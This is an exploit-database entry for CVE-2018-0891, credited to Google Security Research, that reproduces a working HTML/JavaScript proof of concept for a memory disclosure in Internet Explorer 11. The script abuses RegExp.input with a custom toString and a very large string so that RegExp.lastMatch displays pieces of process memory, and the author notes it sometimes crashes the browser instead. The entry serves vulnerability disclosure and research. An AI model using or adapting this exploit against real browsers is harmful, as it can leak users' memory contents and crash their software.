Internet Explorer - 'RegExp.lastMatch' Memory Disclosure



EKU-ID: 7454 CVE: 2018-0891 OSVDB-ID:
Author: Google Security Research Published: 2018-03-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
 
This was tested on IE11 running on Window 7 64-bit with the latest patches applied.
 
PoC:
 
=========================================
*/
 
<!-- saved from url=(0014)about:internet -->
<script>
 
function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}
 
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
 
function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}
 
main();
 
</script>
 
/*
=========================================
 
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/